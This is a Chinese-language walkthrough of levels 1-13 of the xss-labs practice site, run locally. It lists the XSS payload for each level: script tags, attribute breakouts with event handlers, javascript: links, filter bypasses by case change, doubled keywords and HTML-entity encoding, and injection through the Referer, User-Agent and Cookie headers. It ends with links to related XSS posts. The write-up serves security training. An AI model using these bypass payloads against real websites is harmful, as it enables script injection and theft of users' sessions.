XSS小游戏【1-13关】

第一关

Payload:<script>alert(1)</script>

第二关

Payload:keyword=<script>alert(1)</script> 发现没有成功,F12发现需要闭合input 标签

再次输入payload:aaa"><svg οnlοad=alert(1)>

//当这个输入被插入到网页中时,浏览器会将其解析为HTML代码,并执行其中的JavaScript代码

第三关

Payload:<script>alert(1)</script>

Payload:' οnfοcus=javascript:alert('xss') ' 要点击搜索再次按下搜索框就会出现

第四关

payload:<script>alert(1)</script>

F12查看数据源码, 注入测试后,发现过滤了>和<

Payload:"οnclick="alert(111)

第五关

payload:"><a href='javascript:alert(1)'>aa</a>

最后点击那两个蓝色的aa,就会提示你过关

第六关

payload:"><a hReF='javascript:alert(1)'>aa</a>

第7关

Payload:"><a hhrefref='javascscriptript:alert(1)'>'aa'</a>

第八关

payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; 最后点击'友情链接'

第九关

payload:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;//http://www.baidu.com

'添加友情链接->点击友情链接'

第十关

payload:?t_sort=" type="text" οnclick="alert(1)

第十一关(referer参数注入)

payload:referer:"type="text" οnclick="alert(1)

http://127.0.0.1/ljy22601239/xss/level11.php?keyword=good%20job!

第十二关(user-agent参数注入)

payload:User-Agent: "type="text" οnclick="alert(1)

第十三关(cookie参数绕过)

payload:Cookie: user="type="text" οnclick="javascript:alert(1)

保护cookie值,用到setcookie函数

相关推荐
介一安全10 天前
【Web安全】Blind XSS漏洞:从挖掘到防御
安全·web安全·xss
\xin11 天前
pikachu自编exp,xss反射性get,post,存储型xss,dom,dom-x
前端·javascript·xss
\xin12 天前
pikachu自编exp,xss之盲打,过滤,htmlspecialchars,href,js
前端·xss
其实防守也摸鱼13 天前
面试常问问题总结--渗透测试工程师方向
网络·sql·面试·职场和发展·xss·工具·owasp
淼淼爱喝水14 天前
基于DOM型XSS漏洞与利用实验教程
前端·xss·dom·dvwa
天山@12315 天前
跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系
网络安全·xss·beef
兄弟加油,别颓废了。15 天前
XSS-Labs 前 5 关 超详细通关全解
前端·xss
牛奶17 天前
黑客是怎么偷走你账号的?
黑客·浏览器·xss
2603_9535279919 天前
WordPress Finale Lite 插件高危漏洞检测与利用工具 (CVE-2024-30485)
前端·python·安全·web3·xss
oi..21 天前
从 0 到 1:文件上传漏洞的校验、绕过与真实场景利用
网络·笔记·计算机网络·安全·web安全·网络安全·xss